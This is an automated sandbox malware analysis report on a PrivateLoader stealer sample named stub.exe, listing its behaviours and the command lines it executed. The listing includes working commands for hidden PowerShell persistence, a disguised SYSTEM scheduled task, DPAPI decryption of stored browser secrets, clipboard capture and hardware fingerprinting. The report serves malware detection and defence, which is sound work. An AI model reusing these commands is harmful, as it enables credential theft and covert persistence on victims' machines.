Malware Analysis Report

2025-01-02 07:46

Sample ID 240509-spzgtsbe26
Target stub.exe
SHA256 6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef
Tags
execution persistence spyware stealer privateloader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6dab794279dc9e6d92d967740790aa5b3e159a7913cd81b0cf424bdb9f0ac2ef

Threat Level: Known bad

The file stub.exe was found to be: Known bad.

Malicious Activity Summary

execution persistence spyware stealer privateloader

Privateloader family

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Looks up external IP address via web service

Adds Run key to start application

An obfuscated cmd.exe command-line is typically used to evade detection.

Unsigned PE

Enumerates physical storage devices

Modifies registry key

Suspicious use of WriteProcessMemory

Detects videocard installed

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Enumerates processes with tasklist

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-09 15:18

Signatures

Privateloader family

privateloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-09 15:18

Reported

2024-05-09 15:25

Platform

win7-20240508-en

Max time kernel

119s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\stub.exe

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-09 15:18

Reported

2024-05-09 15:25

Platform

win10v2004-20240508-en

Max time kernel

94s

Max time network

97s

Command Line

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\stub.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cscript.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\stub.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\stub.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\suVKZQwSTfGDmgB.ps1\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\stub.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\stub.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2428 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 3152 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3152 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3152 wrote to memory of 4000 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3152 wrote to memory of 4000 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4000 wrote to memory of 3864 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4000 wrote to memory of 3864 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3864 wrote to memory of 4920 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3864 wrote to memory of 4920 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2428 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 3668 wrote to memory of 4328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 3668 wrote to memory of 4328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2164 wrote to memory of 4652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2164 wrote to memory of 4652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2428 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 1032 wrote to memory of 4796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1032 wrote to memory of 4796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1552 wrote to memory of 1760 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1552 wrote to memory of 1760 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2428 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 3208 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3208 wrote to memory of 2800 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2428 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 4600 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1728 wrote to memory of 880 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5044 wrote to memory of 1116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 5044 wrote to memory of 1116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2428 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\reg.exe
PID 2428 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\reg.exe
PID 4600 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4600 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3984 wrote to memory of 944 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3984 wrote to memory of 944 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4332 wrote to memory of 4496 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4332 wrote to memory of 4496 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2428 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 4632 wrote to memory of 4248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 4632 wrote to memory of 4248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cscript.exe
PID 2428 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 3344 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3344 wrote to memory of 4876 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2428 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 2428 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\Temp\stub.exe C:\Windows\system32\cmd.exe
PID 4280 wrote to memory of 5048 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4280 wrote to memory of 5048 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4280 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4280 wrote to memory of 2704 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\stub.exe

"C:\Users\Admin\AppData\Local\Temp\stub.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -noprofile -

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0epdxd2t\0epdxd2t.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5EAA.tmp" "c:\Users\Admin\AppData\Local\Temp\0epdxd2t\CSC9968AE51B6C142EE8A7E58CE6AEABCEB.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,33,156,90,107,92,234,10,181,133,211,213,132,225,131,203,19,43,3,49,39,190,150,249,21,61,57,49,200,210,141,111,17,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,214,130,109,140,61,204,74,148,189,62,217,154,132,189,29,160,26,234,209,30,83,79,12,6,129,130,103,41,196,208,66,54,48,0,0,0,236,8,218,121,146,205,107,71,207,134,9,211,133,7,82,203,50,134,32,93,11,238,254,63,23,243,203,194,220,127,112,141,162,163,30,223,124,74,182,37,157,68,135,13,26,90,83,83,64,0,0,0,236,16,138,167,200,115,64,250,162,134,117,14,7,53,89,144,157,205,82,149,198,14,40,220,234,159,129,235,18,113,4,59,0,212,17,133,25,130,151,144,176,122,34,55,195,60,202,67,224,172,20,174,133,84,215,190,203,254,174,41,10,104,192,145), $null, 'CurrentUser')"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,33,156,90,107,92,234,10,181,133,211,213,132,225,131,203,19,43,3,49,39,190,150,249,21,61,57,49,200,210,141,111,17,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,214,130,109,140,61,204,74,148,189,62,217,154,132,189,29,160,26,234,209,30,83,79,12,6,129,130,103,41,196,208,66,54,48,0,0,0,236,8,218,121,146,205,107,71,207,134,9,211,133,7,82,203,50,134,32,93,11,238,254,63,23,243,203,194,220,127,112,141,162,163,30,223,124,74,182,37,157,68,135,13,26,90,83,83,64,0,0,0,236,16,138,167,200,115,64,250,162,134,117,14,7,53,89,144,157,205,82,149,198,14,40,220,234,159,129,235,18,113,4,59,0,212,17,133,25,130,151,144,176,122,34,55,195,60,202,67,224,172,20,174,133,84,215,190,203,254,174,41,10,104,192,145), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,169,185,211,78,126,178,233,113,146,165,226,217,166,46,54,58,7,126,2,46,52,51,8,33,165,252,252,33,23,55,170,117,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,17,11,201,141,126,201,93,71,249,169,78,142,80,33,175,239,206,207,106,1,120,226,109,40,148,210,70,217,136,37,103,93,48,0,0,0,196,143,154,93,178,189,8,54,194,213,193,83,116,53,243,111,111,77,200,213,127,10,114,6,231,115,160,210,133,174,254,89,248,212,39,71,125,70,83,162,94,87,174,78,120,53,111,193,64,0,0,0,230,177,176,152,136,15,179,107,163,31,172,7,147,247,157,248,126,206,103,252,231,212,64,164,231,127,156,232,77,46,46,112,8,236,160,141,113,40,61,129,30,155,244,246,72,26,227,154,16,181,136,68,101,194,90,66,46,20,238,131,114,189,199,162), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,169,185,211,78,126,178,233,113,146,165,226,217,166,46,54,58,7,126,2,46,52,51,8,33,165,252,252,33,23,55,170,117,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,17,11,201,141,126,201,93,71,249,169,78,142,80,33,175,239,206,207,106,1,120,226,109,40,148,210,70,217,136,37,103,93,48,0,0,0,196,143,154,93,178,189,8,54,194,213,193,83,116,53,243,111,111,77,200,213,127,10,114,6,231,115,160,210,133,174,254,89,248,212,39,71,125,70,83,162,94,87,174,78,120,53,111,193,64,0,0,0,230,177,176,152,136,15,179,107,163,31,172,7,147,247,157,248,126,206,103,252,231,212,64,164,231,127,156,232,77,46,46,112,8,236,160,141,113,40,61,129,30,155,244,246,72,26,227,154,16,181,136,68,101,194,90,66,46,20,238,131,114,189,199,162), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get serialnumber

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""

C:\Windows\system32\cscript.exe

cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

